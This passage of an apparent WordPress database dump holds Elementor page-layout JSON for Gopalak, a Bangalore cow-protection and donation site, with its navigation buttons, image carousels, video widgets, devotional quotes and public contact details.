meo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11069,1841,'_elementor_page_assets','a:0:{}'),(11072,1842,'_elementor_edit_mode','builder'),(11073,1842,'_elementor_template_type','wp-page'),(11074,1842,'_elementor_version','3.7.8'),(11075,1842,'_wp_page_template','elementor_canvas'),(11076,1842,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\\n\\n\\n\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11077,1842,'_elementor_page_assets','a:0:{}'),(11079,1843,'_elementor_edit_mode','builder'),(11080,1843,'_elementor_template_type','wp-page'),(11081,1843,'_elementor_version','3.7.8'),(11082,1843,'_wp_page_template','elementor_canvas'),(11083,1843,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My 